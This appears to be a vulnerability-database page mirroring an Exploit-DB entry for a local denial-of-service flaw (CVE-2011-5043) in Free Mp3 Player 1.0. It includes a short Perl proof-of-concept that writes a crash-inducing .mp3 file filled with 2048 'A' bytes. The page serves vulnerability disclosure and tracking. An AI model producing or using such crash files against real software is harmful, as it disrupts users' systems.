Lucene search
+L

Free Mp3 Player 1.0 - Local Denial of Service

🗓️ 19 Dec 2011 00:00:00Reported by JaMbAType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Free Mp3 Player 1.0 - Local Denial of Service exploit

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2011-5043
30 Dec 201119:00
cve
cvelist
Cvelist
CVE-2011-5043
30 Dec 201119:00
cvelist
euvd
EUVD
EUVD-2011-4946
7 Oct 202500:30
euvd
nvd
NVD
CVE-2011-5043
30 Dec 201119:55
nvd
openvas
OpenVAS
TomatoSoft Free Mp3 Player '.mp3' File DoS Vulnerability
5 Jan 201200:00
openvas
openvas
OpenVAS
TomatoSoft Free Mp3 Player '.mp3' File Denial of Service Vulnerability
5 Jan 201200:00
openvas
prion
Prion
Buffer overflow
30 Dec 201119:55
prion
#!/usr/bin/perl

# Exploit Title:  Free Mp3 Player 1.0 Local Denial of Service
# Date: 19-12-2011
# Author: JaMbA
# Download:
http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Free-Mp3-Player.shtml
# Version: 1.0
# Tested on: Windows 7

my $file= "Crash.mp3";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.mp3 File Created successfully\n";
print "\ Dz-Devloper Work Team (Ahmadso best friend)\n";
close($FILE);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Dec 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.02111
37